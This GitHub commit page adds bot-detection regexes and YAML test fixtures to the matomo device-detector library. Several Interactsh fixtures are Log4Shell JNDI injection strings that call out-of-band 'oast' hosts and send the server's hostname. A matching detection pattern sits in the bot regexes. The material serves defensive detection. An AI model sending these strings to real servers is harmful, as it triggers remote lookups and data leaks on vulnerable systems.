Skip to content

Commit

Permalink
Adds detection for various bots (matomo-org#7612)
Browse files Browse the repository at this point in the history
* Improves detection for Googlebot News
* Adds detection for Interactsh
* Adds detection for webtru
* Adds detection for URLSuMaBot
* Adds detection for 360JK
* Improves detection for generic bots
* Improves detection for generic bots
* Adds detection for UCSB Network Measurement
* Adds detection for Plesk Screenshot Service
* Improves detection for Yahoo! Japan
* Adds detection for Who.is Bot
* Adds detection for Electron Fetch
* Adds detection for WireReaderBot
---------

Co-authored-by: Tutik Alexsandr <[email protected]>
  • Loading branch information
liviuconcioiu and sanchezzzhak authored Mar 11, 2024
1 parent cd99c14 commit 29b5c5d
Show file tree
Hide file tree
Showing 4 changed files with 237 additions and 7 deletions.
6 changes: 6 additions & 0 deletions Tests/Parser/Client/fixtures/library.yml
Original file line number Diff line number Diff line change
Expand Up @@ -641,3 +641,9 @@
type: library
name: Kiwi TCMS API
version: 12.7
-
user_agent: electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)
client:
type: library
name: Electron Fetch
version: "1.0"
146 changes: 143 additions & 3 deletions Tests/fixtures/bots.yml
Original file line number Diff line number Diff line change
Expand Up @@ -1331,7 +1331,7 @@
-
user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22))
bot:
name: Googlebot
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
Expand Down Expand Up @@ -4203,8 +4203,8 @@
url: https://github.com/projectdiscovery/httpx
category: Crawler
producer:
name: ""
url: ""
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: [email protected]'
bot:
Expand Down Expand Up @@ -7205,3 +7205,143 @@
producer:
name: Open Technologies Bulgaria, Ltd.
url: https://kiwitcms.org
-
user_agent: Googlebot-News
bot:
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
name: Google Inc.
url: https://www.google.com/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler
bot:
name: webtru
category: Crawler
url: https://webtru.io/
producer:
name: DataSign Inc.
url: https://datasign.jp/
-
user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36
bot:
name: URLSuMaBot
category: Crawler
url: https://www.urlsuma.de/
-
user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691
bot:
name: 360JK
category: Site Monitor
url: http://jk.cloud.360.cn/
producer:
name: 360 Security Technology Inc.
url: https://www.360.cn/
-
user_agent: LinkChain
bot:
name: Generic Bot
-
user_agent: Morfeus Fucking Scanner
bot:
name: Generic Bot
-
user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;)
bot:
name: UCSB Network Measurement
category: Crawler
url: https://www.it.ucsb.edu/
producer:
name: University of California, Santa Barbara
url: https://www.it.ucsb.edu/
-
user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066
bot:
name: Plesk Screenshot Service
category: Service Agent
url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service
producer:
name: Plesk International GmbH
url: https://www.plesk.com/
-
user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)
bot:
name: Yahoo! Japan ASR
category: Crawler
url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955
producer:
name: Yahoo! Japan Corp.
url: https://www.yahoo.co.jp/
-
user_agent: Who.is Bot
bot:
name: Who.is Bot
category: Crawler
url: https://who.is/
-
user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
-
user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
87 changes: 83 additions & 4 deletions regexes/bots.yml
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,11 @@
# @license http://www.gnu.org/licenses/lgpl.html LGPL v3 or later
###############

- regex: 'WireReaderBot(?:/([\d+.]+))?'
name: 'WireReaderBot'
category: 'Feed Fetcher'
url: 'https://wirereader.app/'

- regex: 'monitoring360bot'
name: '360 Monitoring'
category: 'Site Monitor'
Expand Down Expand Up @@ -768,6 +773,14 @@
name: 'Visual Meta'
url: 'https://www.shopalike.cz/'

- regex: 'Googlebot-News'
name: 'Googlebot News'
category: 'Search bot'
url: 'https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers'
producer:
name: 'Google Inc.'
url: 'https://www.google.com/'

- regex: 'Adwords-(?:DisplayAds|Express|Instant)|Google Web Preview|Google[ -]Publisher[ -]Plugin|Google-(?:Ads-Conversions|Ads-Qualify|Adwords|AMPHTML|Assess|Extended|HotelAdsVerifier|InspectionTool|Lens|PageRenderer|Read-Aloud|Safety|Shopping-Quality|Site-Verification|speakr|Stale-Content-Probe|Test|Youtube-Links)|(?:AdsBot|APIs|DuplexWeb|Feedfetcher|Mediapartners)-Google(?:-Mobile)?|Google(?:AdSenseInfeed|AssociationService|bot|Other|Prober|Producer)|Google.*/\+/web/snippet'
name: 'Googlebot'
category: 'Search bot'
Expand Down Expand Up @@ -1912,6 +1925,22 @@
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Y!J-ASR'
name: 'Yahoo! Japan ASR'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: '^Y!J'
name: 'Yahoo! Japan'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Yandex(?:(?:\.Gazeta |Accessibility|Mobile|MobileScreenShot|RenderResources|Screenshot|Sprav)?Bot|(?:AdNet|Antivirus|Blogs|Calendar|Catalog|Direct|Favicons|ForDomain|ImageResizer|Images|Market|Media|Metrika|News|OntoDB(?:API)?|Pagechecker|Partner|RCA|SearchShop|(?:News|Site)links|Tracker|Turbo|Userproxy|Verticals|Vertis|Video|Webmaster))|YaDirectFetcher'
name: 'Yandex Bot'
category: 'Search bot'
Expand Down Expand Up @@ -2576,8 +2605,16 @@
url: 'https://github.com/projectdiscovery/httpx'
category: 'Crawler'
producer:
name: ''
url: ''
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: '.*\.oast\.'
name: 'Interactsh'
category: 'Security Checker'
url: 'https://github.com/projectdiscovery/interactsh'
producer:
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: 'scaninfo@(?:expanseinc|paloaltonetworks)\.com'
name: 'Expanse'
Expand Down Expand Up @@ -4237,10 +4274,52 @@
name: 'Open Technologies Bulgaria, Ltd.'
url: 'https://kiwitcms.org'

- regex: 'webtru_crawler'
name: 'webtru'
category: 'Crawler'
url: 'https://webtru.io/'
producer:
name: 'DataSign Inc.'
url: 'https://datasign.jp/'

- regex: 'URLSuMaBot'
name: 'URLSuMaBot'
category: 'Crawler'
url: 'https://www.urlsuma.de/'

- regex: '360JK yunjiankong'
name: '360JK'
category: 'Site Monitor'
url: 'http://jk.cloud.360.cn/'
producer:
name: '360 Security Technology Inc.'
url: 'https://www.360.cn/'

- regex: 'UCSBNetworkMeasurement'
name: 'UCSB Network Measurement'
category: 'Crawler'
url: 'https://www.it.ucsb.edu/'
producer:
name: 'University of California, Santa Barbara'
url: 'https://www.it.ucsb.edu/'

- regex: 'Plesk screenshot bot'
name: 'Plesk Screenshot Service'
category: 'Service Agent'
url: 'https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service'
producer:
name: 'Plesk International GmbH'
url: 'https://www.plesk.com/'

- regex: 'Who.is'
name: 'Who.is Bot'
category: 'Crawler'
url: 'https://who.is/'

# Generic bots
- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
name: 'Generic Bot'

# Generic detections
- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scanner|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
name: 'Generic Bot'
5 changes: 5 additions & 0 deletions regexes/client/libraries.yml
Original file line number Diff line number Diff line change
Expand Up @@ -250,6 +250,11 @@
version: '$1'
url: 'https://github.com/node-fetch/node-fetch'

- regex: 'electron-fetch/?(\d+[\.\d]+)?'
name: 'Electron Fetch'
version: '$1'
url: 'https://github.com/arantes555/electron-fetch'

- regex: 'ReactorNetty/(\d+[\.\d]+)'
name: 'ReactorNetty'
version: '$1'
Expand Down

0 comments on commit 29b5c5d

Please sign in to comment.